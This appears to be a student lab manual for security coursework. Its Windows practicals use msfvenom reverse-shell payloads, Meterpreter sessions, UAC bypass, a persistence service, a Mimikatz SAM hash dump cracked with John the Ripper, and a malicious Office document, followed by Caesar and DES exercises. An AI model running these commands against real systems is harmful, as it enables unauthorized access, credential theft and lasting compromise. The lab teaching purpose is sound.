Enrolment No.

BMSF Laboratory

Practical 5
Use msfvenom to exploit windows system and get the meterpreter session.

CSE- Page 1 of 55
Enrolment No. BMSF Laboratory

Practical-5

Use msfvenom to exploit windows system and get the meterpreter session.

Description: This practical session focuses on the steps to exploit the Windows system and
get the meterpreter session. Meterpreter is an advanced, powerful payload within the
Metasploit Framework, specifically designed for exploitation and post-exploitation activities
during penetration testing and ethical hacking engagements.

Tools:

Virtual Machine: Use a virtual machine environment with Kali Linux installed with
Metasploit for a controlled and safe learning environment.

Msfvenom - msfvenom is a versatile tool within the Metasploit Framework used for
generating payloads. Use this tool to create custom payload.

Use windows machine installed on virtual machine as victim machine.

Steps:

1. Create exploit for windows machine using msfvenom

 use command – msfvenom -p windows/shell/reverse_tcp LHOST= <ip
address of your attacker machine i.e. kali> LPORT= 4040 -f exe > reward.exe

 Our payload will be generated and stored in current working directory.

2. Setting up the meterpreter session.

 We need to set a listener on our attacker machine, to listen to the connection of the
target machine. For that, use the following commands:
 use exploit/multi/handler – It will open a multi-handler to set the required
parameters.

CSE- Page 2 of 55
Enrolment No. BMSF Laboratory

 Now we need to set our payload to open the listener. For that, use the following
command:

set payload windows/meterpreter/reverse_tcp

 We also need to set local host.

 Use the command – set LHOST <ip address of attacker machine>

 Now we will set lport i.e. local port on which we will listen the victim
machine.
 Use the command – set LPORT 4040

 Now we are done with all setup.

 Use exploit command to run the exploit.

 Here, we have started reverse TCP handler to listen victim’s machine.

CSE- Page 3 of 55
Enrolment No. BMSF Laboratory

3. Delivery and execution of payload

 To deliver our payload to the target system, we can use different delivery
mechanisms.
 For this practical demo, we will use a Python server to deliver our payload to the
target system.
 Open the Python server in the same directory where, our payload is saved. To run
the Python server, use the command:

python3 -m http.server

 Now go to the victim machine and type the IP address and port number of the
attacker machine in the form of a URL.

 It will list all directories.

 Click on payload file and download it.

CSE- Page 4 of 55
Enrolment No. BMSF Laboratory

 Let’s execute the payload by double click on it and click on run option.

 Now go to attackers’ machine and here, we got meterpreter session of target

machine.

 Check the present working directory of target machine typing pwd command in
meterpreter.

 Use getuid command to get user id of user on target machine.

CSE- Page 5 of 55
Enrolment No. BMSF Laboratory

 We can also check network configuration of target system by using

command ipconfig.

Conclusion:

Through this practical exercise, we've successfully exploited a Windows system to gain
a Meterpreter session. This process enabled us to gather valuable information for our
practice. It highlights the critical importance of cybersecurity measures in protecting
systems against unauthorized access and underscores the need for continuous learning
and vigilance in the ever-evolving landscape of digital security threats.

CSE- Page 6 of 55
Enrolment No. BMSF Laboratory

Practical 6
Use already created meterpreter session to perform post exploitation.

CSE- Page 7 of 55
Enrolment No. BMSF Laboratory

Practical-6
Use already created meterpreter session to perform post exploitation.
Description:

During the post-exploitation phase of our practical exercise, we delved deeper into the
compromised Windows system to explore methods for escalating privileges and
establishing persistence. This phase is crucial in understanding how attackers can
maintain access and control over a compromised system, even after initial access has
been gained.

Privileges escalation:

Privileges escalation involves elevating the level of access or permissions on a system,

granting the attacker greater control and capabilities.

Persistence:

Persistence involves establishing mechanisms or backdoors to maintain access to a

compromised system over an extended period, even after system reboots or security
measures are implemented.

Tools:

Virtual Machine: Use a virtual machine environment with Kali Linux installed with
Metasploit for a controlled and safe learning environment.

Msfvenom: msfvenom is a versatile tool within the Metasploit Framework used for
generating payloads. Use this tool to create custom payload.

Use windows machine installed on virtual machine as victim machine.

Meterpreter: Meterpreter is dynamically extensible payload that uses in-memory DLL

injection stagers and is extended over the network at runtime. It communicates over the
stager socket and provides a comprehensive client-side Ruby API. It features command
history, tab completion, channels, and more.

Steps:

1. Privileges escalation: -

 We have previously created meterpreter sessions for the target system.

 Let’s check the user ID of the logged-on user on the target system, For that, use
command getuid.

CSE- Page 8 of 55
Enrolment No. BMSF Laboratory

 As a result, we have only user-level access on the target system, and we can perform
only limited activities.
 To perform high-priority activities, we need to escalate our privileges.
 To use another exploit to escalate privileges, we need to background this active
session, Use the command background to send this active session in background.
 Use the back command to exit from multi/handler

 Now search for another exploit to bypass the UAC of target system.
 For that, use the command – search exploit/windows/local/bypassuac

 Type- use 2 to use bypassuac payload which has excellent rank.

 Now use show options to see what we need to set.

 Type following commands to set lhost, lport and session.

CSE- Page 9 of 55
Enrolment No. BMSF Laboratory

 We are done with all the setup, run the payload by using run command.

 We have another session opened, now check the user id by using

command getuid.

 The output is username only means we only have user level privileges on target
system.
 Use getsystem command to get admin access on target system.

 Check user id again.

 Now we have the result as NT AUTHORITY\SYSTEM, which means we got admin

privileges on the target system.
 To ensure that, we can check the present working directory.

 We have access to the system32 directory, and it is now confirmed that, we have
admin-level access on the target system.

2. Persistence: -

 To get persistence on the target system, we need to use another exploit.

 For that, we need to background an active session, Use the background command to
send this active session in the background.

CSE- Page 10 of
Enrolment No. BMSF Laboratory

 Use the back command to exit from the previous payload.

 Before using any exploit on the target system, take a snapshot of the target system so,
we can revert it back.
 To take a snapshot, navigate to Oracle Virtual Box and select the took option.

 Now on our attacker machine, search for persistence exploit.

 Use command search exploit/windows/local/persistence_service

 Type use 0 to use this persistence_service exploit.

 Use show options command to know required settings.

CSE- Page 11 of
Enrolment No. BMSF Laboratory

 Here, we need to set another unused port for persistence service.

 Also set another session with session id 2.

 Now run this exploit.

 After running payload, we got a new meterpreter session opened.

 Type the exit command, and check active sessions by using session commands.

 Here, we have three active sessions.

 Now we will kill all these sessions to check persistence on the target system.
 Type command sessions -K.

 Exit from these payloads.

 Now go to desktop, and create one resource file by using text editor.

CSE- Page 12 of
Enrolment No. BMSF Laboratory

 Add all essential commands to start the meterpreter listener.

 Save and exit from these files.

 Within same directory use command msfconsole -r <name of resource file>

 The above command will execute all commands present in this script, and we will get a
meterpreter session if we have made persistence on the target system. Otherwise, it will
just open a new meterpreter listener.

 Here we have successfully gotten the meterpreter session of the target machine, which
means we have made persistence in the target system.

CSE- Page 13 of
Enrolment No. BMSF Laboratory

Conclusion:

The post-exploitation phase of our practical exercise, which involved privileges

escalation and persistence techniques, has provided invaluable insights into the
vulnerabilities of the target system. Through meticulous analysis and execution of
various methods, we successfully demonstrated the potential for adversaries to escalate
privileges and establish persistence, thereby maintaining unauthorized access to the
compromised system.

CSE- Page 14 of
Enrolment No. BMSF Laboratory

Practical 7
Perform windows hash dump using mimikatz module in metasploit.

CSE- Page 15 of
Enrolment No. BMSF Laboratory

Practical-7

Perform windows hash dump using mimikatz module in metasploit.

Description:

Performing a Windows hash dump using the Mimikatz module in Metasploit involves
leveraging the powerful capabilities of both Mimikatz and Metasploit to extract
password hashes from a compromised Windows system

Tools:

Virtual Machine: Use a virtual machine environment with Kali Linux installed with
Metasploit for a controlled and safe learning environment.

Msfvenom: msfvenom is a versatile tool within the Metasploit Framework used for
generating payloads. Use this tool to create custom payload.

Use windows machine installed on virtual machine as victim machine.

Steps:

 We have meterpreter session of target machine.

 Use getuid command to check user id of user on target machine.

 As per the result of getuid command, we have only user level access on target
system.
 To dump the hash values of target system we required admin level access.
 To get admin access, we need to bypass UAC of target system.
 Use background command to send this active session to background.

CSE- Page 16 of
Enrolment No. BMSF Laboratory

 Now search for another exploit to bypass the UAC of target system.
 For that, use the command – search exploit/windows/local/bypassuac

 Type- use 2 to use bypassuac payload which has excellent rank.

 Now use show options to see what we need to set.

 Type following commands to set lhost, lport and session.

 We are done with all the setup, run the payload by using run command.

 Use getsystem command to get admin access on target system.

CSE- Page 17 of
Enrolment No. BMSF Laboratory

 Check user id

 We have uid as a NT AUTHORITY\SYSTEM means, we have admin access on

target system.
 To dump the hash values, we need to load mimikatz module on to the
target system.
 Use command – load mimikatz

 We have successfully loaded mimikatz module on to the target machine

 It has loaded kiwi extension on target machine.
 Use help command to know other commands and uses.

CSE- Page 18 of
Enrolment No. BMSF Laboratory

 Use lsa_dump_sam command to dump all windows user passwors hash values.

 Copy the hash value and make new txt file.

 To brute force this hash we will use john the ripper tool.
 John the ripper required wordlist to brute force this hash value, we will
use rockyou.txt wordlist present in kali linux.
 rockyou.txt is present in /usr/share/wordlists directory.
 Copy this rockyou.txt into your working directory.

 Now use following command as shown in below diagram to perform brute force.

CSE- Page 19 of
Enrolment No. BMSF Laboratory

 If this hash was cracked before then it will give us, error as above.
 To see cracked password use following command.

 Here, we successfully cracked NTLM hash and got windows user password.

Conclusion:

performing a Windows hash dump using the Mimikatz module in Metasploit

provides a powerful means to extract password hashes from compromised
Windows systems during penetration testing or security assessments. By
leveraging the capabilities of Metasploit and Mimikatz, security professionals can
identify weak passwords, assess security posture, and strengthen defenses
against potential attacks.

CSE- Page 20 of
Enrolment No. BMSF Laboratory

Practical 8
1. Create a malicious .docx/.xlsx using Metasploit.

2. Use malicious .docx/.xlsx file to exploit windows system and gain

the meterpreter session.

CSE- Page 21 of
Enrolment No. BMSF Laboratory

Practical-8

1. Create a malicious .docx/.xlsx using Metasploit.

2. Use malicious .docx/.xlsx file to exploit windows system and gain the
meterpreter session.

Description:
In this practical demonstration, we showcase the threat posed by malicious documents by
crafting a .docx or .xlsx file embedded with a payload using Metasploit. Through social
engineering, we entice a user to open the file, triggering the payload execution upon opening.
This exploit establishes a reverse TCP connection back to our attacker machine, granting us a
Meterpreter session.

Tools:

Virtual Machine: Use a virtual machine environment with Kali Linux installed with
Metasploit for a controlled and safe learning environment.

Meterpreter: Meterpreter is dynamically extensible payload that uses in-memory DLL

injection stagers and is extended over the network at runtime. It communicates over the
stager socket and provides a comprehensive client-side Ruby API. It features command
history, tab completion, channels, and more.

Steps:

 Open msfconsole and search for office exploits.

 Choose exploit –
 Here, we will use exploit number 30.

 Use show options command to know required parameters.

CSE- Page 22 of
Enrolment No. BMSF Laboratory

 Set lport and file name.

 Run the exploit using run command.

 It will start server and create payload i.e. malicious document into
/home/project/.msf4/local/ directory.

 Go to victim machine and use server address show on attacker machine.

 It will download default.hta payload on victim machine.

CSE- Page 23 of
Enrolment No. BMSF Laboratory

 Now on attacker type exit command to stop server.

 Change the directory to desktop and make script by using nano editor with
all essential commands as follow.

 Use this script with msfconsole as shown below.

 It will open one tcp handler.

 Run this payload on victim machine.

CSE- Page 24 of
Enrolment No. BMSF Laboratory

 It will open new meterpreter session session.

 Now use various commands to gather information about target system.

Conclusion:

By successfully executing the payload embedded within the document, we highlighted the
critical importance of identifying and addressing security flaws to prevent unauthorized
access and data breaches. This exercise serves as a valuable reminder of the necessity for
robust cybersecurity measures, proactive vulnerability management, and continuous testing to
bolster defences against potential threats. Through penetration testing and simulated attacks,
organizations can uncover weaknesses in their systems and implement targeted security
measures to mitigate risks effectively, ultimately enhancing overall resilience in the face of
cyber threats.

CSE- Page 25 of
Enrolment No. BMSF Laboratory

Practical 9
Implement the following private key cryptography algorithm:

1. Ceaser Cipher

2. DES algorithm

CSE- Page 26 of
Enrolment No. BMSF Laboratory

Practical-9
Implement the following private key cryptography algorithm:

1. Ceaser Cipher

2. DES algorithm
Description:
In implementing the Caesar Cipher algorithm, we'll define functions for encryption and
decryption, shifting characters in the plaintext by a fixed number of positions. This will
illustrate basic substitution cipher principles. Similarly, for the DES algorithm, we'll create
functions for key generation, encryption, and decryption, following the DES algorithm's
permutation and substitution operations. These implementations will provide practical insight
into private key cryptography.

 Ceaser Cipher:

The Caesar Cipher, also known as the shift cipher, is one of the simplest and most
widely known encryption techniques. It is a substitution cipher where each letter in
the plaintext is shifted a certain number of places down or up the alphabet.

 DES algorithm:
Data Encryption Standard, is a symmetric-key block cipher algorithm used for
encryption and decryption of electronic data. It was developed in the 1970s by IBM
and adopted as a standard by the National Institute of Standards and Technology
(NIST) in 1977. DES became widely used for securing electronic communications
and data transmission until it was eventually replaced by more secure algorithms
like AES (Advanced Encryption Standard). Its 56-bit key size is considered
insufficient for modern security standards due to advances in computing power and
cryptanalysis techniques.

Tools:

Anaconda Navigator:

Anaconda Navigator is a graphical user interface (GUI) included with the Anaconda
distribution for Python. It provides an easy-to-use interface to manage packages,
environments, and applications associated with Anaconda.

Jupyter Notebook:

Jupyter Notebook provides an interactive interface where you can create and edit notebooks.
Notebooks consist of cells that can contain code, Markdown text, equations, or raw text.

CSE- Page 27 of
Enrolment No. BMSF Laboratory

Steps:

1. Write python code to implement Caesar cipher.

Code: -

 This code defines a function called Caesar cipher that performs Caesar cipher encryption
on a given text input with a specified shift value.
 import tkinter as tk: This line imports the Tkinter module and aliases it as tk.
 def caesar_cipher(text, shift): This line defines the function caesar_cipher which
takes two parameters:
 text: The text to be encrypted.
 shift: The number of positions to shift each character in the text.
 encrypted_text = "": Initializes an empty string to store the encrypted text.
 for char in text:: Iterates over each character in the input text.
 if char.isalpha():: Checks if the character is an alphabet.
 shifted = ord(char) + shift: Calculates the shifted value of the character by adding
the shift value to its ASCII code.
 if char.islower():: Checks if the character is a lowercase letter.
 if shifted > ord('z'): shifted -= 26: If the shifted value exceeds the ASCII code for
lowercase 'z', it wraps around by subtracting 26.
 if char.isupper():: Checks if the character is an uppercase letter.
 if shifted > ord('Z'): shifted -= 26: If the shifted value exceeds the ASCII code for
uppercase 'Z', it wraps around by subtracting 26.
 encrypted_text += chr(shifted): Converts the shifted ASCII code back to a character
and appends it to the encrypted_text string.
 else: encrypted_text += char: If the character is not an alphabet (e.g., punctuation or
whitespace), it is left unchanged and added to the encrypted_text.
 return encrypted_text: Returns the encrypted text.

CSE- Page 28 of
Enrolment No. BMSF Laboratory

 These functions are part of a GUI application using Tkinter for Caesar cipher encryption
and decryption:
 encrypt_text(): Encrypts input text using a Caesar cipher with a user-specified shift
value. Retrieves input from a text widget, gets the shift value from another widget,
calls the caesar_cipher() function, and displays the encrypted text in an output widget.
 decrypt_text(): Decrypts input text using a Caesar cipher with a user-specified
negative shift value (to reverse encryption). Performs similar steps as encrypt_text()
but with a negated shift value.
 Both functions rely on input entry and shift entry widgets for user input and output entry
widget to display results.

 This code creates a Tkinter window for a Caesar Cipher application with the
following components:
 A window with the title "Caesar Cipher".
 A label "Enter Text:" and a text entry widget (input_entry) for inputting text.
 A label "Shift Value:" and an entry widget (shift_entry) for specifying the shift value.
 The pack() method is used to display these widgets in the window in the order
they are defined.

CSE- Page 29 of
Enrolment No. BMSF Laboratory

 This code adds buttons for encryption and decryption, as well as an output text entry
field. The encrypt_button and decrypt_button widgets trigger the encrypt_text() and
decrypt_text() functions when clicked, respectively. The output_entry widget displays the
encrypted or decrypted text. Finally, window.mainloop() starts the Tkinter event loop,
allowing the GUI to be interactive.

Output –

 Encryption -

CSE- Page 30 of
Enrolment No. BMSF Laboratory

 Decryption -

2. Write python code to implement DES –

Code- –
This code creates a GUI application using Tkinter for encrypting and decrypting text using
the DES algorithm. It imports necessary modules from tkinter and Cryptodome, defines
functions for encryption and decryption, and sets up the GUI layout with labels, entry fields,
and buttons for user interaction. When the user enters a key and plaintext, clicks the
"Encrypt" button, the plaintext is encrypted using DES and displayed as ciphertext. Clicking
the "Decrypt" button decrypts the ciphertext and displays the original plaintext. The code
then runs the Tkinter event loop to keep the GUI application running.

CSE- Page 31 of
Enrolment No. BMSF Laboratory

CSE- Page 32 of
Enrolment No. BMSF Laboratory

Output –

Conclusion:

This practical implementation presents two cryptographic algorithms, the Caesar

Cipher and the DES (Data Encryption Standard), within a Tkinter-based GUI
application. Users can input keys, plaintext, and shift values, then perform encryption
or decryption operations using either algorithm. The GUI interface provides a user-
friendly environment for interacting with the cryptographic functionalities, allowing
users to understand the concepts of substitution ciphers and symmetric-key block
ciphers. This practical exercise enhances understanding of basic cryptographic
principles and their application in software development for data security and
confidentiality.

CSE- Page 33 of